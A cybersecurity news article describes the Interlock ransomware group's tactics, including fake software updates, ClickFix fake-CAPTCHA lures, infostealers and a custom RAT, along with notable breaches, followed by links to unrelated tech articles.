Interlock Ransomware Adapts with New Deceptive Tactics and Tools

Article Highlights
Off On

Since its emergence in late September 2024, the ransomware group known as Interlock has steadily gained notoriety for its cunning and innovative strategies. Despite its relatively modest number of victims, Interlock has made a significant impact with its sophisticated attacks, particularly targeting sectors in North America and Europe. One of their most notable incidents involved the breach of nearly 1.5 million patients’ records at Texas Tech University Health Sciences Center. The continual evolution and refinement of their methods have allowed Interlock to remain a prominent threat in the digital landscape.

Deceptive Tactics and Social Engineering

Interlock initially relied on tricking victims through fake browser updates for popular browsers such as Google Chrome and Microsoft Edge. However, beginning in January, the group expanded its repertoire to include counterfeit security software updates. These updates masqueraded as legitimate products such as FortiClient, Ivanti Secure Access, and Palo Alto Networks Global Protect. This shift in strategy demonstrated the group’s adaptability and their commitment to refining their deceptive methods. Adding to their arsenal, Interlock adopted the ClickFix social-engineering technique. This method involves using fake CAPTCHA prompts to deceive victims into copying and pasting malicious PowerShell commands into their Windows terminal. This technique, which has gained popularity since August 2024, has also been employed by other notorious threat actors, including the North Korean group Lazarus. By utilizing compromised legitimate websites to present these fake CAPTCHAs, Interlock has been successful in leading victims to install a PyInstaller file that deploys a PowerShell backdoor. Interestingly, no additional payloads were observed being installed via this backdoor, suggesting that Interlock was experimenting with this innovative approach without fully exploiting its potential.

Tools of the Trade

In its bid to maintain relevance and avoid the high visibility associated with more prolific ransomware groups, Interlock has developed and deployed a variety of tools such as keyloggers and infostealers. Noteworthy among these tools are BerserkStealer and LummaStealer, with LummaStealer being a prominent malware-as-a-service offering since 2022. These tools allow Interlock to gather sensitive information from victims, furthering their reach and potential impact. The group’s deliberate effort to refine their tools and tactics underscores their commitment to remaining a significant threat in the ransomware landscape.

In addition to keyloggers and infostealers, Interlock employs a custom ransomware for both Windows and Linux systems. This ransomware variant is paired with a unique remote access trojan (RAT) backdoor called Interlock RAT. This backdoor facilitates lateral movement within compromised networks. For this purpose, the group relies on the remote desktop protocol (RDP) and credentials harvested from their infostealers. Furthermore, tools like PuTTY and AnyDesk have been utilized by Interlock for remote access, providing them with the means to effectively navigate and manipulate victim systems.

Evolving Strategies and Implications for Victims

Interlock’s recent revisions to its ransom note mark a strategic shift, highlighting potential legal liabilities for companies if their stolen data is leaked. This tactic underscores the psychological pressure exerted on victims to comply with ransom demands. A notable attack earlier this month targeted the National Defense Corporation, a subsidiary of National Presto Industries. Interlock claimed to have stolen nearly 3 million files from the corporation, thereby raising concerns about the scope and severity of their attacks.

The evolving nature of Interlock’s tactics and strategies reflects a keen understanding of the cyber threat landscape. By continually refining their approaches and leveraging sophisticated social-engineering techniques, Interlock has managed to carve out a niche for themselves, positioning themselves as a resilient and adaptive threat actor. Their ability to adapt and experiment with new methods, such as the ClickFix technique, illustrates a forward-thinking mindset that keeps them one step ahead of traditional defenses.

Conclusion: Addressing the Persistent Threat

Since its appearance in late September 2024, the ransomware group Interlock has been steadily gaining a fearsome reputation due to its clever and innovative tactics. Although it has a relatively small number of victims compared to other groups, Interlock has left a significant mark through its sophisticated cyberattacks, particularly focusing on sectors in North America and Europe. One major incident that brought widespread attention to Interlock involved the breach of almost 1.5 million patient records at Texas Tech University Health Sciences Center. The group has continually adapted and refined its methods, allowing it to stay relevant and dangerous in the ever-changing digital landscape. Interlock’s ability to evolve and implement new strategies makes it a persistent threat to cybersecurity. Their operations have raised alarms, pushing organizations to improve their defenses and stay vigilant against such advanced threats. As long as Interlock continues to innovate, it remains a formidable adversary in the realm of cybersecurity.

Explore more

Apple iPhone 18 Leak Reveals RAM Upgrades for Advanced AI

Dominic Jainy brings a wealth of knowledge to the table regarding the hardware-software symbiosis required for modern artificial intelligence. As an IT professional deeply embedded in the evolution of silicon architecture and machine learning, he offers a unique perspective on why seemingly incremental hardware shifts often dictate the entire user experience. This discussion explores the technical nuances of Apple’s transition

Why Are Investors Choosing Pepeto Over Stagnant Ethereum?

The global cryptocurrency landscape is currently undergoing a fundamental reorganization as capital increasingly migrates from established legacy protocols toward nimble, utility-driven newcomers that offer significant growth potential. For years, Ethereum remained the undisputed leader in smart contract functionality, yet its recent price stagnation has left many market participants searching for more dynamic opportunities. This transition is not merely a product

AI Becomes the Core Infrastructure of Global Banking

The global financial sector has officially moved past the phase of speculative experimentation, cementing artificial intelligence as the definitive architectural foundation upon which all modern banking services now operate. This structural metamorphosis represents a pivot from peripheral innovation toward a state of full-scale operational maturity, where algorithms are no longer viewed as external additions but as the very core of

Will the Vivo X500 Series Set New Flagship Standards?

The swift evolution of mobile technology often leaves consumers wondering if the next major release will truly redefine the experience or simply polish existing features. Currently, the industry looks toward the X500 series as a potential catalyst for change. The pace of innovation has accelerated to a point where a yearly cycle no longer satisfies the hunger for cutting-edge hardware

AI and Supply Chain Risks Reshape the Cyber Threat Landscape

The speed at which a software vulnerability transforms from a quiet discovery into a weaponized global threat has reached a breaking point, redefining the very concept of digital defense. This phenomenon, frequently described as the compression of time, characterizes a modern landscape where the gap between the identification of a flaw and its active exploitation by malicious actors has essentially